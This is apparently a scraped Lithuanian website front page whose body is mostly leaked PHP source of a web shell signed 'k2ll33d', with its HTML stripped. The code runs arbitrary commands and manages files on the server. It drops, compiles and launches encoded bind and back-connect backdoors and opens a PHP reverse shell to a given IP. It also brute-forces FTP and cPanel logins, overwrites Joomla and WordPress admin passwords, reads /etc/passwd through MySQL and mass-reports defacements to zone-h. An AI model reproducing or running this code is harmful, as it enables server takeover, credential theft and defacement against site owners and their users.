Sveiki atvykę!

No front page content has been created yet.

Kaip mus rasti?

[ "; if ($letter.":" != $v){$letters .= $letter;} else {$letters .= "".$letter."";} $letters .= " ] ";}}} if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR'];$bindport = "13123";$bindport_pass = "k2ll33d"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd);$pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "".$pwds[$i]." ".DIRECTORY_SEPARATOR." "; } if(isset($_POST['rename'])){ $old = $_POST['oldname'];$new = $_POST['newname'];@rename($pwd.$old,$pwd.$new);$file = $pwd.$new; } $buff = $software."
"; $buff .= $system."
"; if($id != "") $buff .= $id."
"; if($safemode) $buff .= "safemode : ON
"; else $buff .= "safemode : OFF
";$buff .= $letters." > ".$pwdurl; function rapih($text){ return trim(str_replace("
","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()){return $text;} return stripslashes($text);} function showdir($pwd,$prompt){ $fname = array();$dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE;$user = "????:????"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){$fname[] = $file;}}closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd);$tree = @sizeof($path);$parent = ""; $buff = "
$prompt
view file/folder
"; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name']; } else { $owner = $user; } @error_reporting(0);$buff .= " "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder));$owner = $name['name']." : ".$group['name']; } else {$owner = $user;} $buff .= ""; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder));$owner = $name['name']." : ".$group['name'];} else {$owner = $user;} $buff .= ""; } } foreach($fname as $file){ @error_reporting(0);$full = $pwd.$file; if(!$win && $posix){$name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']." : ".$group['name']; } else { $owner = $user;} $buff .= ""; } $buff .= "
namesizeowner:grouppermsmodifiedactions
$folderLINK".$owner."".get_perms($pwd)."".date("d-M-Y H:i",@filemtime($pwd))."newfile | newfolder
$folderLINK".$owner."".get_perms($parent)."".date("d-M-Y H:i",@filemtime($parent))."newfile | newfolder
[ $folder ]
DIR".$owner."".get_perms($pwd.$folder)."".date("d-M-Y H:i",@filemtime($folder))."rename | delete
$file
".ukuran($full)."".$owner."".get_perms($full)."".date("d-M-Y H:i",@filemtime($full))." edit | rename | delete | download (gzip)
"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) {$size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists('system')) {@ob_start();@system($cmd);$buff = @ob_get_contents(); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')){@ob_start(); @passthru($cmd);$buff = @ob_get_contents();@ob_end_clean(); return $buff;} elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz);@fclose($file);}} function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); }@fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont);@fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd){case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text);} $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?>:: k2ll33d ::

Folder


file name


Index code






Done

";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){$defacer='ReZK2LL';$display_details=0;$method=14;$reason=5; error_reporting(0);set_time_limit(0); if(!function_exists('curl_init')){echo "CURL ERROR\n";exit;}$cli=(isset($argv[0]))?1:0; if($cli==1){$file=$argv[1];$sites=file($file); if(!file_exists($file)){echo "

error !

\n";exit;}}else{if(function_exists(apache_setenv)){@apache_setenv('no-gzip', 1);}@ini_set('zlib.output_compression', 0);@ini_set('implicit_flush', 1);@ob_implicit_flush(true);@ob_end_flush(); if(isset($_POST['domains'])){$sites=explode("\n",$_POST['domains']);} if (file_exists($_FILES["file"]["tmp_name"])){$file=$_FILES["file"]["tmp_name"];$sites=file($file);} echo <<

EOF;
if(!isset($_POST['defacer'])){
echo <<
Your Nick:

Domains:

 
OR
Submit form .txt file:



EOF; } $defacer=$_POST['defacer'];} if(!$sites){echo '
';exit;} $sites=array_unique(str_replace('http://','',$sites));$total=count($sites); echo "[+] Total unique domain: $total\n\n"; $pause=10;$start=time();$main=curl_multi_init(); for($m=0;$m<3;$m++){$http[] = curl_init();} for($n=0;$n<$total;$n +=30){ if($display_details==1){ for($x=0;$x<30;$x++){echo'[+] Adding '.rtrim($sites[$n+$x]).'';echo "\n";}}$d=$n+30; if($d>$total){$d=$total;}echo "=====================>[$d/$total]\n"; for($w=0;$w<3;$w++){$p=$w * 10; if(!(isset($sites[$n+$p]))){$pause=$w;break;} $posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send"; $curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => false,CURLOPT_HTTPHEADER => array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT => 3,CURLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]); curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($main,$http[$w]);}$running = null; do{curl_multi_exec($main,$running);}while($running > 0); for($m=0;$m<3;$m++){ if($pause==$m){break;} curl_multi_remove_handle($main, $http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE); if ($code != 200) { while(true){ echo' [-]Serevr Error!....Retrying';echo "\n"; sleep(5);curl_exec($http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE); if( $code== 200){break 1;}}}}}$end= time() - $start; echo '+++++++DONE+++++++';echo "\n\n[*]Time took: $end seconds\n";curl_multi_close($main); if($cli==0){echo '';} exit;} elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')){$connect_timeout=5; set_time_limit(0); $submit=$_REQUEST['submit'];$users=$_REQUEST['users'];$pass=$_REQUEST['passwords'];$target=$_REQUEST['target'];$cracktype=$_REQUEST['cracktype']; if($target == ""){$target = "localhost";} ?>

";exit;} elseif ( curl_errno($ch) == 0 ){print "
Username ($user) and Password ($pass)
";}curl_close($ch);} function cpanel_check($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://$host:2082");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);curl_setopt($ch, CURLOPT_FAILONERROR, 1);$data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "Error :Connection Timeout

";exit;} elseif ( curl_errno($ch) == 0 ){ print "
[+]Username ($user) and Password ($pass)
";}curl_close($ch);}if(isset($submit) && !empty($submit)){ if(empty($users) && empty($pass)){ print "

Error : Check The Users or Password List Entry

"; exit; } if(empty($users)){ print "

Error : Please Check The Users List Entry . . .

"; exit; }if(empty($pass) ){ print "

Error : Please Check The Password List Entry . . .

"; exit; }; $userlist=explode("\n",$users);$passlist=explode("\n",$pass); print "[~] Please Wait ...

"; foreach ($userlist as $user) {$pureuser = trim($user); foreach ($passlist as $password ) {$purepass = trim($password); if($cracktype == "ftp"){ftp_check($target,$pureuser,$purepass,$connect_timeout);} if ($cracktype == "cpanel"){cpanel_check($target,$pureuser,$purepass,$connect_timeout);}}}} echo "

IP :

userspasswords

Cpanel(2082) Ftp (21)


"; die();} elseif(isset($_GET['x']) && ($_GET['x'] == 'joomla')){ if(empty($_POST['pwd'])){ echo "





DB_Prefix :   host :   database :   username :   password :   
  
New Username:  

New Password:  

  
"; } else { $prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$admin = $_POST['admin'];$pd = ($_POST["pwd"]);$pwd = md5($pd); @mysql_connect($localhost,$username,$password) or die (mysql_error()); @mysql_select_db($database) or die (mysql_error()); $SQL=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());$SQL=@mysql_query("UPDATE ".$prefix."users SET password ='".$pwd."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error()); if($SQL) echo "

Done... go and login

";}} elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){ if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){ $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "
"; $msg .= "

Connected to ".$sqluser."@".$sqlhost.":".$sqlport; $msg .= "  ->  [ databases ]"; if(isset($_GET['db'])) $msg .= "  ->  ".htmlspecialchars($_GET['db']).""; if(isset($_GET['table'])) $msg .= "  ->  ".htmlspecialchars($_GET['table']).""; $msg .= "

version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."

"; $msg .= "
"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;"; $msg = "

"; $tables = array(); $msg .= ""; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= ""; } $msg .= "
available tables on ".$db."
$table
"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "

"; $columns = array(); $msg = ""; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "";$kolum = $column; }$msg .= ""; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1;$pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= ""; foreach($datas as $data){ if(trim($data) == "") $data = " ";$msg .= ""; }$msg .= ""; } $msg .= "
$column
$data
"; $head = "
Page
"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "

"; @mysql_select_db($db);$querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "

".$query.";   [ ok ]

"; $msg .= ""; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "";$msg .= ""; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= ""; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= ""; } $msg .= ""; } $msg .= "
".htmlspecialchars(@mysql_field_name($hasil,$i))."
".$dataz."
"; } else $msg .= "

".$query.";   [ error ]

"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "

"; $dbs = array(); $msg .= ""; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= ""; } $msg .= "
available databases
$db
"; } @mysql_close($con); } else $msg = "

cant connect to mysql server

"; echo $msg; } else{ ?>



Connect to mySQL server
  Host
  Username
  Password
  Port 

Domains and Users

";$d0mains = @file("/etc/named.conf"); if(!$d0mains){ die("
Error :  i can't read [ /etc/named.conf ]
"); } echo ''; foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains);flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo "";flush(); }}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'wordpress')){ if(empty($_POST['pwd'])){ echo "





DB_Prefix :   host :   database :   username :   password :   

New username :

New password :
  
";}else{ $prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database= $_POST['database'];$username= $_POST['username'];$password= $_POST['password'];$pwd= $_POST['pwd'];$admin= $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd);$k2=@mysql_query("UPDATE ".$prefix."users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error()); $k2=@mysql_query("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error()); if($k2){echo '

Done ... go and login

';}} echo '';} elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){ function base64($text){echo base64_encode($text);}function mdhash($text) {echo md5($text);}function whash($text) {echo crypt($text);}$text = $_POST['code'];?>





'.$codi.'';} elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"")+6;$akhir = strpos($buff,""); echo "
".substr($buff,$awal,$akhir-$awal)."
"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file));$group=@posix_getgrgid(@filegroup($file));$owner = $name['name']." : ".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "
Domainsusers
".$domains[1][0]."".$user['name']."
Filename".$file."
Size".ukuran($file)."
Permission".get_perms($file)."
Owner".$owner."
Create time".date("d-M-Y H:i",@filectime($file))."
Last modified".date("d-M-Y H:i",@filemtime($file))."
Last accessed".date("d-M-Y H:i",@fileatime($file))."
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
"; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "
"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "
"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "
"; } else { echo "
"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "
"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved @ ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file))$file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
Save as  



from computer

from url
link
Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor is dead

"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &");$scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){$msg = "

Process found running, backdoor setup successfully.

"; } else {$msg = "

Process not found running, backdoor is dead.

"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']);tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." on port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']);$port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp");$p2=which("perl");exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." on port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']);$wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)){$msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>



Bind PortBack connectdownload and Exploit
Port
Password
Use

IP">
Port
Use

url
cmd

Reverse shell ( php )

Your IP
Port
"; echo $s_result; if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']); if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']); if ($_POST['xback_php']) { $ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0; if(function_exists('pcntl_fork')){$pid = pcntl_fork(); if ($pid == -1) exit(1); if ($pid) exit(0); if (posix_setsid() == -1) exit(1);$daemon = 1;} umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30); if(!$sock) exit(1); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if(!is_resource($process)) exit(1); stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while(1){ if(feof($sock)) break; if(feof($pipes[1])) break; $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if(in_array($sock, $read_a)){ $input = fread($sock, $chunk_size); fwrite($pipes[0], $input);} if(in_array($pipes[1], $read_a)){ $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if(in_array($pipes[2], $read_a)){ $input = fread($pipes[2], $chunk_size); fwrite($sock, $input); }} fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]); proc_close($process);$rsres = " ";$s_result .= $rsres; }} elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){?>